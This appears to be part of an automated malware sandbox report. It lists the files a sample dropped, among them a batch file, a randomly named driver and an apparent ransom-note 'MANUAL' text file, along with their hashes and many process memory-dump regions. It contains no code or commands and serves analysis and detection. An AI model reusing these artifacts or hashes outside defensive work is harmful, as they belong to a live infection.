125KB

MD5
597de376b1f80c06d501415dd973dcec

SHA1
629c9649ced38fd815124221b80c9d9c59a85e74

SHA256
f47e3555461472f23ab4766e4d5b6f6fd260e335a6abc31b860e569a720a5446

SHA512
072565912208e97cc691e1a102e32fd6c243b5a3f8047a159e97aabbe302bddc36f3c52cecde3b506151bc89e0f3b5acf6552a82d83dac6e0180c873d36d3f6b

Download Submit
C:\Windows\SysWOW64\ac\systembackup.bat

Filesize
1KB

MD5
b4b2f1a6c7a905781be7d877487fc665

SHA1
7ee27672d89940e96bcb7616560a4bef8d8af76c

SHA256
6246b0045ca11da483e38317421317dc22462a8d81e500dee909a5269c086b5f

SHA512
f883cea56a9ac5dcb838802753770494ce7b1de9d7da6a49b878d534810f9c87170f04e0b8b516ae19b9492f40635a72b3e8a4533d39312383c520abe00c5ae6

Download Submit
C:\Windows\SysWOW64\ac\zlwtcnovrnamuk.sys

Filesize
674KB

MD5
b2233d1efb0b7a897ea477a66cd08227

SHA1
835a198a11c9d106fc6aabe26b9b3e59f6ec68fd

SHA256
5fd17e3b8827b5bb515343bc4066be0814f6466fb4294501becac284a378c0da

SHA512
6ca61854db877d767ce587ac3d7526cda8254d937a159fd985e0475d062d07ae83e7ff4f9f42c7e1e1cad5e1f408f6849866aa4e9e48b29d80510e5c695cee37

Download Submit
F:\$RECYCLE.BIN\S-1-5-21-259785868-298165991-4178590326-1000\XOYLPRH-MANUAL.txt

Filesize
8KB

MD5
d5720c73da8b817846dad8c0e252d7ca

SHA1
dc13408b80605b31292122286a8751ac95d6c35d

SHA256
8f6a373d538d06c946d72d677b4de0d13df2c384bf3ebe47edc556e4fca85b52

SHA512
61eba6e6bbd3294d15612d850f7be051d6e79ca26c401fb1a33403675c26dc63dfff2b69752fb4963d1df2e6d6bc365ba121a42762d1935af67295c9830a72ae

Download Submit
\??\pipe\crashpad_3740_SOQKIVQBCXJYSPNA

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/1580-1294-0x0000000004950000-0x000000000497B000-memory.dmp

Filesize
172KB

Download
memory/1580-2105-0x00000000735E0000-0x0000000073D90000-memory.dmp

Filesize
7.7MB

Download
memory/1580-1257-0x0000000004AD0000-0x0000000004AE0000-memory.dmp

Filesize
64KB

Download
memory/1580-1258-0x0000000004950000-0x0000000004982000-memory.dmp

Filesize
200KB

Download
memory/1580-1256-0x0000000004AD0000-0x0000000004AE0000-memory.dmp

Filesize
64KB

Download
memory/1580-1259-0x0000000004950000-0x000000000497B000-memory.dmp

Filesize
172KB

Download
memory/1580-1260-0x0000000004950000-0x000000000497B000-memory.dmp

Filesize
172KB

Download
memory/1580-1262-0x0000000004950000-0x000000000497B000-memory.dmp

Filesize
172KB

Download
memory/1580-1264-0x0000000004950000-0x000000000497B000-memory.dmp

Filesize
172KB

Download
memory/1580-1266-0x0000000004950000-0x000000000497B000-memory.dmp

Filesize
172KB

Download
memory/1580-1268-0x0000000004950000-0x000000000497B000-memory.dmp

Filesize
172KB

Download
memory/1580-1270-0x0000000004950000-0x000000000497B000-memory.dmp

Filesize
172KB

Download
memory/1580-1272-0x0000000004950000-0x000000000497B000-memory.dmp

Filesize
172KB

Download
memory/1580-1312-0x0000000004950000-0x000000000497B000-memory.dmp

Filesize
172KB

Download
memory/1580-1276-0x0000000004950000-0x000000000497B000-memory.dmp

Filesize
172KB

Download
memory/1580-1278-0x0000000004950000-0x000000000497B000-memory.dmp

Filesize
172KB

Download
memory/1580-1280-0x0000000004950000-0x000000000497B000-memory.dmp

Filesize
172KB

Download
memory/1580-1282-0x0000000004950000-0x000000000497B000-memory.dmp

Filesize
172KB

Download
memory/1580-1284-0x0000000004950000-0x000000000497B000-memory.dmp

Filesize
172KB

Download
memory/1580-1286-0x0000000004950000-0x000000000497B000-memory.dmp

Filesize
172KB

Download
memory/1580-1288-0x0000000004950000-0x000000000497B000-memory.dmp

Filesize
172KB

Download
memory/1580-1290-0x0000000004950000-0x000000000497B000-memory.dmp

Filesize
172KB

Download
memory/1580-1292-0x0000000004950000-0x000000000497B000-memory.dmp

Filesize
172KB

Download
memory/1580-1306-0x0000000004950000-0x000000000497B000-memory.dmp

Filesize
172KB

Download
memory/1580-1304-0x0000000004950000-0x000000000497B000-memory.dmp

Filesize
172KB

Download
memory/1580-1302-0x0000000004950000-0x000000000497B000-memory.dmp

Filesize
172KB

Download
memory/1580-1300-0x0000000004950000-0x000000000497B000-memory.dmp

Filesize
172KB

Download
memory/1580-1298-0x0000000004950000-0x000000000497B000-memory.dmp

Filesize
172KB

Download
memory/1580-1296-0x0000000004950000-0x000000000497B000-memory.dmp

Filesize
172KB

Download
memory/1580-2109-0x0000000004AD0000-0x0000000004AE0000-memory.dmp

Filesize
64KB

Download
memory/1580-1308-0x0000000004950000-0x000000000497B000-memory.dmp

Filesize
172KB

Download
memory/1580-1255-0x0000000004AD0000-0x0000000004AE0000-memory.dmp

Filesize
64KB

Download
memory/1580-1274-0x0000000004950000-0x000000000497B000-memory.dmp

Filesize
172KB

Download
memory/1580-1314-0x0000000004950000-0x000000000497B000-memory.dmp

Filesize
172KB

Download
memory/1580-1316-0x0000000004950000-0x000000000497B000-memory.dmp

Filesize
172KB

Download
memory/1580-1383-0x0000000004AD0000-0x0000000004AE0000-memory.dmp

Filesize
64KB

Download
memory/1580-1384-0x00000000049A0000-0x00000000049A1000-memory.dmp

Filesize
4KB

Download
memory/1580-2107-0x0000000004AD0000-0x0000000004AE0000-memory.dmp

Filesize
64KB

Download
memory/1580-1253-0x00000000023E0000-0x0000000002412000-memory.dmp

Filesize
200KB

Download
memory/1580-1310-0x0000000004950000-0x000000000497B000-memory.dmp

Filesize
172KB

Download
memory/1580-1254-0x00000000735E0000-0x0000000073D90000-memory.dmp

Filesize
7.7MB

Download
memory/3216-964-0x0000000005A80000-0x0000000005B1C000-memory.dmp

Filesize
624KB

Download
memory/3216-963-0x0000000075260000-0x0000000075A10000-memory.dmp

Filesize
7.7MB

Download
memory/3216-1077-0x0000000075260000-0x0000000075A10000-memory.dmp

Filesize
7.7MB

Download
memory/3216-962-0x0000000000FC0000-0x0000000001042000-memory.dmp

Filesize
520KB

Download
memory/3216-970-0x0000000005A70000-0x0000000005A80000-memory.dmp

Filesize
64KB

Download
memory/3216-1080-0x0000000075260000-0x0000000075A10000-memory.dmp

Filesize
7.7MB

Download
memory/3216-1079-0x0000000005A70000-0x0000000005A80000-memory.dmp

Filesize
64KB

Download
memory/3216-1078-0x0000000005A70000-0x0000000005A80000-memory.dmp

Filesize
64KB

Download
memory/3216-967-0x0000000005A70000-0x0000000005A80000-memory.dmp

Filesize
64KB

Download
memory/3216-965-0x00000000060D0000-0x0000000006674000-memory.dmp

Filesize
5.6MB

Download
memory/3216-969-0x0000000005D20000-0x0000000005D76000-memory.dmp

Filesize
344KB

Download
memory/3216-966-0x0000000005B20000-0x0000000005BB2000-memory.dmp

Filesize
584KB

Download
memory/3216-968-0x0000000005A30000-0x0000000005A3A000-memory.dmp

Filesize
40KB

Download
memory/3816-1225-0x0000000000400000-0x0000000000B02000-memory.dmp

Filesize
7.0MB

Download
memory/3816-1248-0x0000000000400000-0x0000000000B02000-memory.dmp

Filesize
7.0MB

Download
memory/3816-1249-0x0000000000400000-0x0000000000B02000-memory.dmp

Filesize
7.0MB

Download
memory/3816-1232-0x0000000077B20000-0x0000000077C10000-memory.dmp

Filesize
960KB

Download
memory/3816-1250-0x0000000077B20000-0x0000000077C10000-memory.dmp

Filesize
960KB

Download
memory/4156-1247-0x0000000140000000-0x0000000140ACB000-memory.dmp

Filesize
10.8MB

Download
memory/4156-1252-0x0000000140000000-0x0000000140ACB000-memory.dmp

Filesize
10.8MB

Download
memory/4156-1251-0x0000000140000000-0x0000000140ACB000-memory.dmp

Filesize
10.8MB

Download
memory/4280-1386-0x00000000053D0000-0x00000000054D0000-memory.dmp

Filesize
1024KB

Download